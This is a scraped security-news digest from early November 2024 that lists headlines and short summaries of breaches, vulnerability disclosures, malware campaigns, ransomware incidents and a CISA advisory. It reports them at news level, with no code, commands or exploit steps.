    Amazon disclosed a data breach exposing employee data, with information allegedly stolen in the May 2023 MOVEit attacks. Amazon disclosed a data breach that exposed employee information after data was allegedly stolen during the May 2023 MOVEit attacks. The company said that the data was stolen from a third-party vendor. Amazon did not disclose the […] "

    Autosummary: Amazon discloses employee data breach after May 2023 MOVEit attacks. Pierluigi Paganini, November 11, 2024. Amazon disclosed a data breach exposing employee data, with information allegedly stolen in the May 2023 MOVEit attacks. "


    Week in review: Zero-click flaw in Synology NAS devices, Google fixes exploited Android vulnerability

    exploits
    2024-11-10 https://www.helpnetsecurity.com/2024/11/10/week-in-review-zero-click-flaw-in-synology-nas-devices-google-fixes-exploited-android-vulnerability/

    Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Millions of Synology NAS devices vulnerable to zero-click attacks (CVE-2024-10443) Synology has released fixes for an unauthenticated “zero-click” remote code execution flaw (CVE-2024-10443, aka RISK:STATION) affecting its popular DiskStation and BeeStation network attached storage (NAS) devices. Google patches actively exploited Android vulnerability (CVE-2024-43093) Google has delivered fixes for two vulnerabilities endangering Android users that “may be under limited, targeted exploitation”: … More

    The post Week in review: Zero-click flaw in Synology NAS devices, Google fixes exploited Android vulnerability appeared first on Help Net Security.

    "

    Autosummary: Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Millions of Synology NAS devices vulnerable to zero-click attacks (CVE-2024-10443) Synology has released fixes for an unauthenticated “zero-click” remote code execution flaw (CVE-2024-10443, aka RISK:STATION) affecting its popular DiskStation and BeeStation network attached storage (NAS) devices. Google patches actively exploited Android vulnerability (CVE-2024-43093) Google has delivered fixes for two vulnerabilities endangering Android users that “may be under limited, targeted exploitation”: CVE-2024-43047, a flaw affecting Qualcomm chipsets, and CVE-2024-43093, a vulnerability in the Google Play framework. "


    U.S. agency cautions employees to limit phone use due to Salt Typhoon hack of telco providers

    Telcos
    2024-11-10 https://securityaffairs.com/170737/hacking/u-s-agency-limit-phone-use-due-to-salt-typhoon-hack.html
    US CFPB warns employees to avoid work-related mobile calls and texts following China-linked Salt Typhoon hack over security concerns. The US government’s Consumer Financial Protection Bureau (CFPB) advises employees to avoid using cellphones for work after China-linked APT group Salt Typhoon hackers breached major telecom providers. The Consumer Financial Protection Bureau (CFPB) is a U.S. […] "

    Autosummary: In August, Volexity researchers reported that a China-linked APT group, tracked as StormBamboo (aka Evasive Panda, Daggerfly, and StormCloud), successfully compromised an undisclosed internet service provider (ISP) in order to poison DNS responses for target organizations. Cisco addressed an NX-OS zero-day, tracked as CVE-2024-20399 (CVSS score of 6.0), that the China-linked group Velvet Ant exploited to deploy previously unknown malware as root on vulnerable switches. "


    SECURITY AFFAIRS MALWARE NEWSLETTER – ROUND 19

    exploits
    2024-11-10 https://securityaffairs.com/170771/breaking-news/security-affairs-malware-newsletter-round-19.html
    Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape. CRON#TRAP: Emulated Linux Environments as the Latest Tactic in Malware Staging. Typosquat Campaign Targeting npm Developers. ToxicPanda: […] "

    Autosummary: "


    Bitcoin Fog Founder Sentenced to 12 Years for Cryptocurrency Money Laundering

    financial
    2024-11-09 https://thehackernews.com/2024/11/bitcoin-fog-founder-sentenced-to-12.html
    The 36-year-old founder of the Bitcoin Fog cryptocurrency mixer has been sentenced to 12 years and six months in prison for facilitating money laundering activities between 2011 and 2021. Roman Sterlingov, a dual Russian-Swedish national, pleaded guilty to charges of money laundering and operating an unlicensed money-transmitting business earlier this March. The U.S. Department of Justice (DoJ) "

    Autosummary: "Over the course of its decade-long operation, Bitcoin Fog gained notoriety as a go-to money laundering service for criminals seeking to hide their illicit proceeds from law enforcement and processed transactions involving over 1.2 million bitcoin, valued at approximately $400 million at the time the transactions occurred," the DoJ said. "


    Crypto expert with links to gang shot dead at Brazilian airport

    latam
    2024-11-09 https://www.bbc.com/news/articles/cly0re9xpvlo
    Antônio Vinicius Gritzbach had recently agreed to hand over information about the Primeiro Comando da Capital group.

    Autosummary: Gritzbach, a former member of the PCC, dropped his bag and tried to run away - but he was shot many times and died at the scene.


    Veeam Backup & Replication exploit reused in new Frag ransomware attack

    exploits ransomware
    2024-11-09 https://securityaffairs.com/170717/malware/veeam-backup-replication-flaw-frag-ransomware.html
    A critical flaw, tracked as CVE-2024-40711, in Veeam Backup & Replication (VBR) was also recently exploited to deploy Frag ransomware. In mid-October, Sophos researchers warned that ransomware operators are exploiting the critical vulnerability CVE-2024-40711 in Veeam Backup & Replication to create rogue accounts and deploy malware. In early September 2024, Veeam released security updates to address multiple vulnerabilities impacting […]

    Autosummary: (Pierluigi Paganini, November 09, 2024) In a recent attack, threat group STAC 5881 accessed networks via a compromised VPN appliance, exploited a VEEAM vulnerability, and then created accounts named “point” and “point2.”


    Scammers target UK senior citizens with Winter Fuel Payment texts

    financial
    2024-11-09 https://www.bleepingcomputer.com/news/security/scammers-target-uk-senior-citizens-with-winter-fuel-payment-texts/
    As the winter season kicks in, scammers are not missing the chance to target senior British residents with bogus "winter heating allowance" and "cost of living support" scam texts. [...]

    Autosummary: The text urges the recipient to click on a link, leading them to a lookalike GOV.UK page: “Please note that the government has decided that the Winter heating_allowance and Cost of Living_support for 2024 have been fully implemented, you have met the requirements, please be sure to fill in the application information as soon as possible, we will release the money to you within 3days, please note that check, this will be the last notice to you, the online application channel deadline is November 12.” The domain name comprising the phrases "notices," "gov," and "e" is likely an attempt, albeit an unrefined one, to make it appear authentic.


    CISA Alerts to Active Exploitation of Critical Palo Alto Networks Vulnerability

    exploits
    2024-11-08 https://thehackernews.com/2024/11/cisa-alerts-to-active-exploitation-of.html
    The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday added a now-patched critical security flaw impacting Palo Alto Networks Expedition to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation. The vulnerability, tracked as CVE-2024-5910 (CVSS score: 9.3), concerns a case of missing authentication in the Expedition migration tool that



    New CRON#TRAP Malware Infects Windows by Hiding in Linux VM to Evade Antivirus

    exploits Linux
    2024-11-08 https://thehackernews.com/2024/11/new-crontrap-malware-infects-windows-by.html
    Cybersecurity researchers have flagged a new malware campaign that infects Windows systems with a Linux virtual instance containing a backdoor capable of establishing remote access to the compromised hosts. The "intriguing" campaign, codenamed CRON#TRAP, starts with a malicious Windows shortcut (LNK) file likely distributed in the form of a ZIP archive via a phishing email. "What makes the CRON#

    Autosummary: The activity, which has mainly targeted countries like Romania, Poland, Germany, and Kazakhstan, starts with a batch file present within the archive file.


    Critical Palo Alto Networks Expedition bug exploited (CVE-2024-5910)

    exploits
    2024-11-08 https://www.helpnetsecurity.com/2024/11/08/cve-2024-5910/

    A vulnerability (CVE-2024-5910) in Palo Alto Networks Expedition, a firewall configuration migration tool, is being exploited by attackers in the wild, the Cybersecurity and Infrastructure Security Agency (CISA) confirmed on Thursday. About CVE-2024-5910 Unearthed and reported by Brian Hysell of Synopsys Cybersecurity Research Center (CyRC), CVE-2024-5910 stems from missing authentication for a critical function, which can lead to an Expedition admin account takeover for attackers with network access to the installation. A security update fixing … More

    The post Critical Palo Alto Networks Expedition bug exploited (CVE-2024-5910) appeared first on Help Net Security.



    The vCISO Academy: Transforming MSPs and MSSPs into Cybersecurity Powerhouses

    ciber
    2024-11-08 https://thehackernews.com/2024/11/the-vciso-academy-transforming-msps-and.html
    We’ve all heard a million times: growing demand for robust cybersecurity in the face of rising cyber threats is undeniable. Globally small and medium-sized businesses (SMBs) are increasingly targeted by cyberattacks but often lack the resources for full-time Chief Information Security Officers (CISOs). This gap is driving the rise of the virtual CISO (vCISO) model, offering a cost-effective

    Autosummary: Key features of the academy include: expert guidance from industry experts who share their practical knowledge and experience on a wide range of essential vCISO functions, including risk and compliance assessments, cybersecurity strategy development, and effective communication of risks to executive teams. By addressing the knowledge shortage and providing structured, accessible learning, the vCISO Academy allows service providers to broaden their perspective: the vCISO Academy provides a deeper understanding of what it means to be a vCISO with specialized training to address the cybersecurity shortage.


    Malicious NPM Packages Target Roblox Users with Data-Stealing Malware

    exploits
    2024-11-08 https://thehackernews.com/2024/11/malicious-npm-packages-target-roblox.html
    A new campaign has targeted the npm package repository with malicious JavaScript libraries that are designed to infect Roblox users with open-source stealer malware such as Skuld and Blank-Grabber. "This incident highlights the alarming ease with which threat actors can launch supply chain attacks by exploiting trust and human error within the open source ecosystem, and using readily available



    Webinar: Learn How Storytelling Can Make Cybersecurity Training Fun and Effective

    ciber
    2024-11-08 https://thehackernews.com/2024/11/webinar-learn-how-storytelling-can-make.html
    Let’s face it—traditional security training can feel as thrilling as reading the fine print on a software update. It’s routine, predictable, and, let’s be honest, often forgotten the moment it's over. Now, imagine cybersecurity training that’s as unforgettable as your favorite show. Remember how "Hamilton" made history come alive, or how "The Office" taught us CPR (Staying Alive beat, anyone?)?

    Autosummary: What to Expect in the Webinar: Industry experts, Dima Kumets (Principal Product Manager) and James O'Leary (Product Marketing Manager), will guide you through a fresh approach to security training that resonates with users and admins alike.


    Unpatched Mazda Connect bugs let hackers install persistent malware

    exploits
    2024-11-08 https://www.bleepingcomputer.com/news/security/unpatched-mazda-connect-bugs-let-hackers-install-persistent-malware/
    Attackers could exploit several vulnerabilities in the Mazda Connect infotainment unit, present in multiple car models including Mazda 3 (2014-2021), to execute arbitrary code with root permission. [...]

    Autosummary: According to the report, compromising a car's infotainment system using the disclosed vulnerabilities could allow database manipulation, information disclosure, creating arbitrary files, injecting arbitrary OS commands that could lead to full compromise of the system, gaining persistence, and executing arbitrary code before the operating system boots. By exploiting CVE-2024-8356, a threat actor could install a malicious firmware version and gain direct access to the connected controller area networks (CAN buses) and reach the vehicle's electronic control units (ECUs) for the engine, brakes, transmission, or powertrain.


    Palo Alto Networks warns of potential PAN-OS RCE vulnerability

    exploits
    2024-11-08 https://www.bleepingcomputer.com/news/security/palo-alto-networks-warns-of-potential-pan-os-rce-vulnerability/
    Palo Alto Networks warned customers to restrict access to their next-generation firewalls because of a potential remote code execution vulnerability in the PAN-OS management interface. [...]

    Autosummary: While CISA didn't provide more details on these attacks, Horizon3.ai vulnerability researcher Zach Hanley released a proof-of-concept exploit last month that chains it with a command injection vulnerability (tracked as CVE-2024-9464) to gain "unauthenticated" arbitrary command execution on vulnerable Expedition servers.


    AndroxGh0st Malware Integrates Mozi Botnet to Target IoT and Cloud Services

    exploits industry
    2024-11-08 https://thehackernews.com/2024/11/androxgh0st-malware-integrates-mozi.html
    The threat actors behind the AndroxGh0st malware are now exploiting a broader set of security flaws impacting various internet-facing applications, while also deploying the Mozi botnet malware. "This botnet utilizes remote code execution and credential-stealing methods to maintain persistent access, leveraging unpatched vulnerabilities to infiltrate critical infrastructures," CloudSEK said in a

    Autosummary:
    • Oracle E-Business Suite (EBS) unauthenticated arbitrary file upload vulnerability
    • CVE-2023-1389 (CVSS score: 8.8) - TP-Link Archer AX21 firmware command injection vulnerability
    • CVE-2024-4577 (CVSS score: 9.8) - PHP CGI argument injection vulnerability
    • CVE-2024-36401 (CVSS score: 9.8) - GeoServer remote code execution vulnerability
    "The botnet cycles through common administrative usernames and uses a consistent password pattern," the company said.


    iPhones in a law enforcement forensics lab mysteriously rebooted losing their After First Unlock (AFU) state

    government industry
    2024-11-08 https://securityaffairs.com/170683/mobile-2/iphones-in-law-enforcement-forensics-lab-mysteriously-rebooted.html
    Law enforcement warns that securely stored iPhones awaiting forensic examination are mysteriously rebooting, making them much harder to unlock, per a document obtained by 404 Media. 404 Media obtained the document from a mobile […]

    Autosummary: (Pierluigi Paganini, November 08, 2024)


    Critical Veeam RCE bug now used in Frag ransomware attacks

    exploits ransomware
    2024-11-08 https://www.bleepingcomputer.com/news/security/critical-veeam-rce-bug-now-used-in-frag-ransomware-attacks/
    After being used in Akira and Fog ransomware attacks, a critical Veeam Backup & Replication (VBR) security flaw was also recently exploited to deploy Frag ransomware. [...]

    Autosummary: Frag ransom note (Sophos). "In a recent case MDR analysts once again observed the tactics associated with STAC 5881 – but this time observed the deployment of a previously-undocumented ransomware called 'Frag,'" said Sean Gallagher, a principal threat researcher at Sophos X-Ops.


    Texas oilfield supplier Newpark Resources suffered a ransomware attack

    exploits ransomware
    2024-11-08 https://securityaffairs.com/170696/cyber-crime/newpark-resources-ransomware-attack.html
    Texas oilfield supplier Newpark Resources suffered a ransomware attack that disrupted its information systems and business applications. Texas oilfield supplier Newpark Resources revealed that a ransomware attack on October 29 disrupted access to some of its information systems and business applications. The company immediately activated its cybersecurity response plan and launched an investigation into the […]



    2023 Top Routinely Exploited Vulnerabilities

    exploits
    2024-11-08 https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-317a

    Summary

    The following cybersecurity agencies coauthored this joint Cybersecurity Advisory (hereafter collectively referred to as the authoring agencies):

    • United States: The Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and National Security Agency (NSA)
    • Australia: Australian Signals Directorate’s Australian Cyber Security Centre (ACSC)
    • Canada: Canadian Centre for Cyber Security (CCCS)
    • New Zealand: New Zealand National Cyber Security Centre (NCSC-NZ) and Computer Emergency Response Team New Zealand (CERT NZ)
    • United Kingdom: National Cyber Security Centre (NCSC-UK)

    This advisory provides details, collected and compiled by the authoring agencies, on the Common Vulnerabilities and Exposures (CVEs) routinely and frequently exploited by malicious cyber actors in 2023 and their associated Common Weakness Enumerations (CWEs). Malicious cyber actors exploited more zero-day vulnerabilities to compromise enterprise networks in 2023 compared to 2022, allowing them to conduct operations against high priority targets.

    The authoring agencies strongly encourage vendors, designers, developers, and end-user organizations to implement the following recommendations, and those found within the Mitigations section of this advisory, to reduce the risk of compromise by malicious cyber actors.

    • Vendors, designers, and developers. Implement secure by design and default principles and tactics to reduce the prevalence of vulnerabilities in your software.
      • Follow the SP 800-218 



        Large eBay malvertising campaign leads to scams

        financial
        2024-11-07 https://www.malwarebytes.com/blog/scams/2024/11/large-ebay-malvertising-campaign-leads-to-scams
        Consumers are being swamped by Google ads claiming to be eBay's customer service.

        Autosummary: Indicators of Compromise: fake pages and fraudulent phone numbers. Flurry of ads: A search for ‘ebay phone number‘ or ‘ebay customer service‘ from the U.S. using Google Chrome returned several ads that were entirely fraudulent.


        Critical vulnerability in Cisco industrial wireless access points fixed (CVE-2024-20418)

        exploits industry
        2024-11-07 https://www.helpnetsecurity.com/2024/11/07/cve-2024-20418/

        Cisco has fixed a critical command injection vulnerability (CVE-2024-20418) affecting its Ultra-Reliable Wireless Backhaul (URWB) Access Points that can be exploited via HTTP requests and allows complete compromise of the devices. There are no workarounds to address this flaw, though vulnerable access points can be protected by switching off URWB mode, the company shared in the advisory. The good news is that the vulnerability was discovered by a Cisco employee during internal security testing … More

        The post Critical vulnerability in Cisco industrial wireless access points fixed (CVE-2024-20418) appeared first on Help Net Security.



        Cisco Releases Patch for Critical URWB Vulnerability in Industrial Wireless Systems

        exploits industry
        2024-11-07 https://thehackernews.com/2024/11/cisco-releases-patch-for-critical-urwb.html
        Cisco has released security updates to address a maximum severity security flaw impacting Ultra-Reliable Wireless Backhaul (URWB) Access Points that could permit unauthenticated, remote attackers to run commands with elevated privileges. Tracked as CVE-2024-20418 (CVSS score: 10.0), the vulnerability has been described as stemming from a lack of input validation to the web-based management



        Industrial companies in Europe targeted with GuLoader

        industry
        2024-11-07 https://www.helpnetsecurity.com/2024/11/07/industrial-europe-spear-phishing-guloader/

        A recent spear-phishing campaign targeting industrial and engineering companies in Europe was aimed at saddling victims with the popular GuLoader downloader and, ultimately, a remote access trojan that would permit attackers to steal information from and access compromised computers whenever they wish. “The emails are sent from various email addresses including from fake companies and compromised accounts. The emails typically hijack an existing email thread or request information about an order,” Tara Gould, Threat Research … More

        The post Industrial companies in Europe targeted with GuLoader appeared first on Help Net Security.


        Autosummary: “This allows malicious code to be run through a legitimate process, meaning security products may not detect the malware, or victims may not be alerted since the process will look like a normal Windows process,” Gould told Help Net Security.


        North Korean hackers employ new tactics to compromise crypto-related businesses

        industry
        2024-11-07 https://www.helpnetsecurity.com/2024/11/07/north-korean-crypto-related-phishing/

        North Korean hackers are targeting crypto-related businesses with phishing emails and novel macOS-specific malware. The crypto-related phishing campaign Since July 2024, phishing emails seemingly containing helpful information on risks related to the rise of the price of Bitcoin have been sent to intended victims in cryptocurrency-related industries, SentinelLabs researchers have found. The phishing email (Source: SentinelLabs) The email urges the recipient to click on the “Open” button to download a PDF file, but doing that … More

        The post North Korean hackers employ new tactics to compromise crypto-related businesses appeared first on Help Net Security.


        Autosummary: “We might speculate that heightened attention on previous [Democratic People’s Republic of Korea] campaigns could have reduced the effectiveness of previous ‘social media grooming’ attempts, perhaps as a result of intended targets in DeFi, ETF and other crypto-related industries becoming more wary, but it is equally likely that such state-backed threat actors have sufficient resources to pursue multiple strategies simultaneously,” the researchers noted. “In the case of this malware, the commands launch the backdoor written to disk earlier by the stage-one dropper,” Stokes told Help Net Security, and added that if the backdoor has been removed, the persistence mechanism will not be able to reinstall it.


        North Korean Hackers Target Crypto Firms with Hidden Risk Malware on macOS

        exploits
        2024-11-07 https://thehackernews.com/2024/11/north-korean-hackers-target-crypto.html
        A threat actor with ties to the Democratic People's Republic of Korea (DPRK) has been observed targeting cryptocurrency-related businesses with a multi-stage malware capable of infecting Apple macOS devices. Cybersecurity company SentinelOne, which dubbed the campaign Hidden Risk, attributed it with high confidence to BlueNoroff, which has been previously linked to malware families such as

        Autosummary: Cybersecurity company SentinelOne, which dubbed the campaign Hidden Risk, attributed it with high confidence to BlueNoroff, which has been previously linked to malware families such as RustBucket, KANDYKORN, ObjCShellz, RustDoor (aka Thiefbucket), and TodoSwift. The application, written in the Swift programming language, has been found to be signed and notarized on October 19, 2024, with the Apple developer ID "Avantis Regtech Private Limited (2S8XHJ7948)."


        5 Most Common Malware Techniques in 2024

        exploits
        2024-11-07 https://thehackernews.com/2024/11/5-most-common-malware-techniques-in-2024.html
        Tactics, techniques, and procedures (TTPs) form the foundation of modern defense strategies. Unlike indicators of compromise (IOCs), TTPs are more stable, making them a reliable way to identify specific cyber threats. Here are some of the most commonly used techniques, according to ANY.RUN's Q3 2024 report on malware trends, complete with real-world examples. Disabling of Windows Event Logging

        Autosummary: Simply upload a file or URL to start the analysis process. Threat detection takes less than 60 seconds. The service quickly extracts deep insights into malware behavior and generates threat reports. Type, open links, download attachments, and run programs, all inside the VM. Use private analysis mode and team collaboration tools. Integrate ANY.RUN's sandbox into your organization's workflow with a 14-day free trial to try everything it has to offer. By using Registry Run Keys and the Startup Folder, attackers can maintain long-term persistence, allowing them to continue their malicious activities, such as data exfiltration, lateral movement within a network, or further exploitation of the system. Modification of Registry Run Keys (T1547.001): To ensure that the malicious software runs automatically whenever a system starts, attackers add entries to specific registry keys that are designed to launch programs at startup.


        SteelFox and Rhadamanthys Malware Use Copyright Scams, Driver Exploits to Target Victims

        financial exploits
        2024-11-07 https://thehackernews.com/2024/11/steelfox-and-rhadamanthys-malware-use.html
        An ongoing phishing campaign is employing copyright infringement-related themes to trick victims into downloading a newer version of the Rhadamanthys information stealer since July 2024. Cybersecurity firm Check Point is tracking the large-scale campaign under the name CopyRh(ight)adamantys. Targeted regions include the United States, Europe, East Asia, and South America. "The campaign

        Autosummary: The campaign, dating back to February 2023, has claimed victims across the world, particularly those located in Brazil, China, Russia, Mexico, UAE, Egypt, Algeria, Vietnam, India, and Sri Lanka. The miner, for its part, is downloaded from a GitHub repository, with the malware also initiating contact with a remote server over TLS version 1.3 to exfiltrate sensitive data from web browsers, such as cookies, credit card data, browsing history, and visited places, system metadata, installed software, and timezone, among others.


        Canada ordered ByteDance to shut down TikTok operations in the country over security concerns

        government
        2024-11-07 https://securityaffairs.com/170653/security/canada-ordered-bytedance-to-shut-down-tiktok-operations.html
        Canada ordered ByteDance to shut down TikTok operations over security concerns but did not issue a full ban on the platform. The Canadian government ordered ByteDance to wind up TikTok Technology Canada, Inc. over security concerns following a national security review under the Investment Canada Act. Canada’s decision to require ByteDance to dissolve the operations of […]

        Autosummary: (Pierluigi Paganini, November 07, 2024)


        Critical bug in Cisco UWRB access points allows attackers to run commands as root

        exploits
        2024-11-07 https://securityaffairs.com/170646/security/cisco-uwrb-crirical-flaw.html
        Cisco fixed a critical flaw in URWB access points, allowing attackers to run root commands, compromising industrial wireless automation security. Cisco has addressed a critical vulnerability, tracked as CVE-2024-20418, that could be exploited by unauthenticated, remote attackers to run commands with root privileges on vulnerable Ultra-Reliable Wireless Backhaul (URWB) access points used for industrial wireless […]

        Autosummary: (Pierluigi Paganini, November 07, 2024)


        Malwarebytes acquires AzireVPN to fuel additional VPN features and functionalities

        exploits
        2024-11-07 https://www.malwarebytes.com/blog/personal/2024/11/malwarebytes-acquires-azirevpn-to-fuel-additional-vpn-features-and-functionalities
        We have great news to share: Malwarebytes has acquired AzireVPN, a privacy-focused VPN provider.

        Autosummary: They will continue to enjoy our streamlined, integrated user experience, and our no-log service will never track, store, or share any user network data.


        Malwarebytes acquires AzireVPN to boost security for customers

        exploits
        2024-11-07 https://www.helpnetsecurity.com/2024/11/07/malwarebytes-azirevpn-acquisition/

        Malwarebytes announced the acquisition of AzireVPN, a renowned privacy-focused VPN provider. Malwarebytes has long been a defender of user privacy through its portfolio of consumer solutions, including Malwarebytes Privacy VPN and its free ad and scam blocker web extension Malwarebytes Browser Guard. This acquisition further supports the company’s mission to reimagine consumer cybersecurity to protect devices and data, no matter where users are located, how they work and play, or the size of their wallet. … More

        The post Malwarebytes acquires AzireVPN to boost security for customers appeared first on Help Net Security.


        Autosummary: “Malwarebytes is a fierce advocate for privacy, and this acquisition reinforces our dedication to driving innovation that protects a free and open internet,” said Marcin Kleczynski, CEO, Malwarebytes.


        CISA warns of critical Palo Alto Networks bug exploited in attacks

        exploits
        2024-11-07 https://www.bleepingcomputer.com/news/security/cisa-warns-of-critical-palo-alto-networks-bug-exploited-in-attacks/
        Today, CISA warned that attackers are exploiting a critical missing authentication vulnerability in Palo Alto Networks Expedition, a migration tool that can help convert firewall configuration from Checkpoint, Cisco, and other vendors to PAN-OS. [...]



        DPRK-linked BlueNoroff used macOS malware with novel persistence

        exploits
        2024-11-07 https://securityaffairs.com/170659/malware/bluenoroff-apt-macos-malware.html
        SentinelLabs observed North Korea-linked threat actor BlueNoroff targeting businesses in the crypto industry with a new multi-stage malware. SentinelLabs researchers identified a North Korea-linked threat actor targeting crypto businesses with new macOS malware as part of a campaign tracked as “Hidden Risk.” The attackers, linked to BlueNoroff and past RustBucket campaigns, used fake cryptocurrency news emails […]

        Autosummary: (Pierluigi Paganini, November 07, 2024) The initial attack vector is a phishing email containing a link to a malicious application disguised as a link to a PDF document relating to a cryptocurrency topic such as “Hidden Risk Behind New Surge of Bitcoin Price”, “Altcoin Season 2.0-The Hidden Gems to Watch” and “New Era for Stablecoins and DeFi, CeFi”.


        Police find 11 bodies in pick-up truck in Mexico

        latam
        2024-11-07 https://www.bbc.com/news/articles/cew2y194vlgo
        The grim discovery was made in the city of Chilpancingo, whose mayor was beheaded last month.



        North Korean hackers use new macOS malware against crypto firms

        exploits
        2024-11-07 https://www.bleepingcomputer.com/news/security/north-korean-hackers-use-new-macos-malware-against-crypto-firms/
        North Korean threat actor BlueNoroff has been targeting crypto-related businesses with a new multi-stage malware for macOS systems. [...]

        Autosummary: Malicious zshenv file (Source: SentinelLabs). The malware installs a hidden "touch file" in the /tmp/ directory to mark successful infection and persistence, ensuring the payload remains active across reboots and user sessions.


        U.S. CISA adds Palo Alto Expedition, Android, CyberPanel and Nostromo nhttpd bugs to its Known Exploited Vulnerabilities catalog

        exploits
        2024-11-07 https://securityaffairs.com/170673/security/u-s-cisa-adds-palo-alto-expedition-android-cyberpanel-and-nostromo-nhttpd-bugs-to-its-known-exploited-vulnerabilities-catalog.html
        U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Palo Alto Expedition, Android, CyberPanel and Nostromo nhttpd bugs to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: CVE-2024-43093 – this week, Google warned that the vulnerability CVE-2024-43093 in the Android OS is […]

        Autosummary: The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog:
        • CVE-2024-43093 Android Framework Privilege Escalation Vulnerability
        • CVE-2024-51567 CyberPanel Incorrect Default Permissions Vulnerability
        • CVE-2019-16278 Nostromo nhttpd Directory Traversal Vulnerability
        • CVE-2024-5910 Palo Alto Expedition Missing Authentication Vulnerability
        CVE-2024-43093 – this week, Google warned that the vulnerability CVE-2024-43093 in the Android OS is actively exploited in the wild.


        Key cybersecurity predictions for 2025

        ciber
        2024-11-06 https://www.helpnetsecurity.com/2024/11/06/key-cybersecurity-predictions-2025-video/

        In this Help Net Security video, Chris Gibson, CEO at FIRST, discusses the evolving threat landscape and provides a unique take on where data breaches and cyber attacks will be in 2025.

        The post Key cybersecurity predictions for 2025 appeared first on Help Net Security.

        "

        Autosummary: "


        Identity-related data breaches cost more than average incidents

        financial
        2024-11-06 https://www.helpnetsecurity.com/2024/11/06/identity-related-data-breaches-cost/

        Identity-related data breaches are more severe and costly than run-of-the-mill incidents, according to RSA. 40% of respondents reported an identity-related security breach. Of those, 66% reported it as a severe event that affected their organization. 44% estimated that the total costs of identity-related data breaches exceeded the cost of a typical data breach. These findings underscore why organizations should prioritize investing in security capabilities that can mitigate the high costs of identity-related breaches. AI seen … More

        The post Identity-related data breaches cost more than average incidents appeared first on Help Net Security.

        "

        Autosummary: By sector, agriculture and aerospace estimated that identity-related data breaches tended to cost them the most, with 50% and 43% of respondents noting that breaches had cost them more than $10,000,000 (respectively). "


        The cybersecurity gender gap: How diverse teams improve threat response

        ciber
        2024-11-06 https://www.helpnetsecurity.com/2024/11/06/julie-madhusoodanan-linkedin-gender-gap-cybersecurity/

        In this Help Net Security interview, Julie Madhusoodanan, Head of CyberSecurity at LinkedIn, discusses how closing the gender gap could enhance cybersecurity’s effectiveness in combating emerging threats. With women still underrepresented in cybersecurity roles, she emphasizes how diverse teams bring essential skills and innovative perspectives. Madhusoodanan outlines strategies like inclusive hiring, mentorship, and flexible work policies as essential steps to foster gender balance in the field. What impact would closing the gender gap in cybersecurity … More

        The post The cybersecurity gender gap: How diverse teams improve threat response appeared first on Help Net Security.

        "

        Autosummary: Ultimately, closing the gender gap will require a multi-pronged approach, including educational reforms to promote inclusive access to cybersecurity (and STEM) education, targeted training programs for women, highlighting female role models in cybersecurity, and more. These initiatives offer women guidance, support, and networking opportunities, which are key for navigating career paths in a male-dominated field. Upskilling and career growth; training and mentorship schemes, especially in pre- and middle-management roles Factoring in gender when up-skilling for AI; as the workplace is transformed, ensuring training is handled in a fair and equitable way. "


        GoZone ransomware accuses and threatens victims

        exploits ransomware
        2024-11-06 https://www.helpnetsecurity.com/2024/11/06/gozone-ransomware-d3pru/

        A new ransomware dubbed GoZone is being leveraged by attackers that don’t seem to be very greedy: they are asking the victims to pay just $1,000 in Bitcoin if they want their files decrypted. The GoZone HTML ransom note (Source: SonicWall) The ransom notes shown by the malware lay out another incentive for paying up: they claim that child sexual abuse material has been found on the targeted computer and urge the victim to pay … More

        The post GoZone ransomware accuses and threatens victims appeared first on Help Net Security.

        "

        Autosummary: "


        Symbiotic provides developers with real-time feedback on potential security vulnerabilities

        industry
        2024-11-06 https://www.helpnetsecurity.com/2024/11/06/symbiotic-security-real-time-feedback/

        Symbiotic Security launched a real-time security solution for software development that combines detection and remediation with just-in-time training – incorporating security testing and training directly into the development process without breaking developers’ workflows. Backed with $3 million of seed funding from investors including Lerer Hippeau, Axeleo Capital, Factorial Capital, and others, the company has introduced its software-as-a-service that works with the developer’s Integrated Development Environment (IDE) and enables them to develop software more securely. A Ponemon … More

        The post Symbiotic provides developers with real-time feedback on potential security vulnerabilities appeared first on Help Net Security.

        "

        Autosummary: “Traditional approaches to code security are broken, which we fix by integrating security at the time code is written,” said Jerome Robert, CEO, Symbiotic Security. "


        Update your Android: Google patches two zero-day vulnerabilities

        exploits
        2024-11-06 https://www.malwarebytes.com/blog/news/2024/11/update-your-android-google-patches-two-zero-day-vulnerabilities
        Google has released patches for two zero-days and a lot of other high level vulnerabilities. "

        Autosummary: For most phones it works like this: Under About phone or About device you can tap on Software updates to check if there are new updates available for your device, although there may be slight differences based on the brand, type, and Android version of your device. "


        New Winos 4.0 Malware Infects Gamers Through Malicious Game Optimization Apps

        exploits
        2024-11-06 https://thehackernews.com/2024/11/new-winos-40-malware-infects-gamers.html
        Cybersecurity researchers are warning that a command-and-control (C&C) framework called Winos is being distributed within gaming-related applications like installation tools, speed boosters, and optimization utilities. "Winos 4.0 is an advanced malicious framework that offers comprehensive functionality, a stable architecture, and efficient control over numerous online endpoints to execute "

        Autosummary: "


        Cisco bug lets hackers run commands as root on URWB access points

        exploits
        2024-11-06 https://www.bleepingcomputer.com/news/security/cisco-bug-lets-hackers-run-commands-as-root-on-uwrb-access-points/
        Cisco has fixed a maximum severity vulnerability that allows attackers to run commands with root privileges on vulnerable Ultra-Reliable Wireless Backhaul (URWB) access points that provide connectivity for industrial wireless automation. [...] "

        Autosummary: "


        New SteelFox malware hijacks Windows PCs using vulnerable driver

        exploits
        2024-11-06 https://www.bleepingcomputer.com/news/security/new-steelfox-malware-hijacks-windows-pcs-using-vulnerable-driver/
        A new malicious package called "SteelFox" mines for cryptocurrency and steals credit card data by using the "bring your own vulnerable driver" technique to get SYSTEM privileges on Windows machines. [...] "

        Autosummary: Based on Kaspersky's visibility, the malware compromises systems in Brazil, China, Russia, Mexico, UAE, Egypt, Algeria, Vietnam, India, and Sri Lanka. "


        Washington courts' systems offline following weekend cyberattack

        ciber
